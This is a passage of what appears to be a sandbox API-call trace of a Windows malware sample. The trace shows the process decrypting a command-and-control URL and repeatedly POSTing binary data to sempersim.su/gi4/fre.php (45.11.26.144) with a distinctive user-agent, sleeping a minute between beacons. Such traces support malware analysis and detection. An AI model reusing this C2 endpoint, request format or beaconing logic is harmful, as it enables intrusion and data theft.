len=236, flags=0) returned 236 [0266.675] send (s=0x3b8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0266.675] GetProcessHeap () returned 0x5b0000 [0266.675] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0266.675] recv (in: s=0x3b8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0267.817] GetProcessHeap () returned 0x5b0000 [0267.817] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0267.817] GetProcessHeap () returned 0x5b0000 [0267.818] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3620 | out: hHeap=0x5b0000) returned 1 [0267.818] GetProcessHeap () returned 0x5b0000 [0267.819] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0267.819] GetProcessHeap () returned 0x5b0000 [0267.819] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5998 | out: hHeap=0x5b0000) returned 1 [0267.819] closesocket (s=0x3b8) returned 0 [0267.820] GetProcessHeap () returned 0x5b0000 [0267.820] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0267.820] GetProcessHeap () returned 0x5b0000 [0267.820] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0267.820] GetProcessHeap () returned 0x5b0000 [0267.821] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0267.821] GetProcessHeap () returned 0x5b0000 [0267.821] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0267.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc2c) returned 0x3b8 [0267.822] Sleep (dwMilliseconds=0xea60) [0267.828] GetProcessHeap () returned 0x5b0000 [0267.828] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0267.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.829] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0267.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.835] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0267.841] GetProcessHeap () returned 0x5b0000 [0267.841] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0267.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.841] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0267.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.842] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0267.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.846] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.846] GetProcessHeap () returned 0x5b0000 [0267.847] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0267.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.848] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0267.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.848] CryptDestroyKey (hKey=0x5bde08) returned 1 [0267.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.849] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0267.849] GetProcessHeap () returned 0x5b0000 [0267.849] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0267.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.850] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.851] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.852] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.853] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.853] GetProcessHeap () returned 0x5b0000 [0267.853] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0267.853] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0267.853] GetProcessHeap () returned 0x5b0000 [0267.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0267.853] GetProcessHeap () returned 0x5b0000 [0267.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0267.854] GetProcessHeap () returned 0x5b0000 [0267.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0267.854] GetProcessHeap () returned 0x5b0000 [0267.854] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0267.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.855] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0267.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.860] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0267.865] GetProcessHeap () returned 0x5b0000 [0267.865] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0267.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.866] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0267.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.866] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0267.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.867] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.867] GetProcessHeap () returned 0x5b0000 [0267.868] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0267.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.868] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0267.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.869] CryptDestroyKey (hKey=0x5be288) returned 1 [0267.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0267.870] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0267.870] GetProcessHeap () returned 0x5b0000 [0267.870] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0267.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.871] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0267.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.872] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0267.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0267.872] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0267.872] GetProcessHeap () returned 0x5b0000 [0267.872] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0267.872] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdd40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0268.070] GetProcessHeap () returned 0x5b0000 [0268.070] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca930 [0268.070] socket (af=2, type=1, protocol=6) returned 0x3bc [0268.070] connect (s=0x3bc, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0268.190] FreeAddrInfoW (pAddrInfo=0x5cdd40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0268.191] GetProcessHeap () returned 0x5b0000 [0268.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0268.191] GetProcessHeap () returned 0x5b0000 [0268.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0268.191] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0268.192] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0268.192] GetProcessHeap () returned 0x5b0000 [0268.192] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0268.193] GetProcessHeap () returned 0x5b0000 [0268.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0268.193] GetProcessHeap () returned 0x5b0000 [0268.193] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3470 [0268.193] GetProcessHeap () returned 0x5b0000 [0268.193] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0268.194] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0268.195] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0268.195] GetProcessHeap () returned 0x5b0000 [0268.195] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0268.195] GetProcessHeap () returned 0x5b0000 [0268.195] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0268.195] send (s=0x3bc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0268.195] send (s=0x3bc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0268.196] GetProcessHeap () returned 0x5b0000 [0268.196] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0268.196] recv (in: s=0x3bc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0269.622] GetProcessHeap () returned 0x5b0000 [0269.623] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0269.623] GetProcessHeap () returned 0x5b0000 [0269.623] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0269.624] GetProcessHeap () returned 0x5b0000 [0269.624] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0269.624] GetProcessHeap () returned 0x5b0000 [0269.625] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0269.625] closesocket (s=0x3bc) returned 0 [0269.626] GetProcessHeap () returned 0x5b0000 [0269.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca930 | out: hHeap=0x5b0000) returned 1 [0269.626] GetProcessHeap () returned 0x5b0000 [0269.626] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0269.626] GetProcessHeap () returned 0x5b0000 [0269.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0269.627] GetProcessHeap () returned 0x5b0000 [0269.627] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0269.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc30) returned 0x3bc [0269.631] Sleep (dwMilliseconds=0xea60) [0269.640] GetProcessHeap () returned 0x5b0000 [0269.640] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0269.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.641] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0269.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.649] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0269.655] GetProcessHeap () returned 0x5b0000 [0269.655] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0269.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.658] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0269.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.659] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0269.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.660] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.660] GetProcessHeap () returned 0x5b0000 [0269.660] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0269.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.661] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0269.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.662] CryptDestroyKey (hKey=0x5be048) returned 1 [0269.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.663] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0269.663] GetProcessHeap () returned 0x5b0000 [0269.663] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0269.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.664] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.665] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.665] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.666] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.666] GetProcessHeap () returned 0x5b0000 [0269.666] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0269.666] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0269.666] GetProcessHeap () returned 0x5b0000 [0269.667] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0269.667] GetProcessHeap () returned 0x5b0000 [0269.667] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0269.667] GetProcessHeap () returned 0x5b0000 [0269.668] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0269.668] GetProcessHeap () returned 0x5b0000 [0269.668] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0269.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.669] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0269.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.680] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0269.704] GetProcessHeap () returned 0x5b0000 [0269.704] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0269.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.705] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0269.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.706] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0269.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.707] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.707] GetProcessHeap () returned 0x5b0000 [0269.708] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0269.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.709] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0269.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.710] CryptDestroyKey (hKey=0x5be048) returned 1 [0269.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0269.711] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0269.711] GetProcessHeap () returned 0x5b0000 [0269.711] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0269.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.712] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0269.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.713] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0269.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0269.714] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0269.714] GetProcessHeap () returned 0x5b0000 [0269.714] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0269.714] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdca0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0269.716] GetProcessHeap () returned 0x5b0000 [0269.716] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa80 [0269.716] socket (af=2, type=1, protocol=6) returned 0x3c0 [0269.716] connect (s=0x3c0, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0269.785] FreeAddrInfoW (pAddrInfo=0x5cdca0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0269.785] GetProcessHeap () returned 0x5b0000 [0269.785] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0269.785] GetProcessHeap () returned 0x5b0000 [0269.785] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0269.786] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0269.786] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0269.787] GetProcessHeap () returned 0x5b0000 [0269.787] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0269.787] GetProcessHeap () returned 0x5b0000 [0269.787] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0269.787] GetProcessHeap () returned 0x5b0000 [0269.787] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2fa8 [0269.787] GetProcessHeap () returned 0x5b0000 [0269.787] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0269.788] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0269.789] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0269.789] GetProcessHeap () returned 0x5b0000 [0269.789] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0269.789] GetProcessHeap () returned 0x5b0000 [0269.789] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0269.789] send (s=0x3c0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0269.790] send (s=0x3c0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0269.790] GetProcessHeap () returned 0x5b0000 [0269.790] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0269.790] recv (in: s=0x3c0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0271.181] GetProcessHeap () returned 0x5b0000 [0271.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0271.182] GetProcessHeap () returned 0x5b0000 [0271.182] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0271.182] GetProcessHeap () returned 0x5b0000 [0271.183] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: 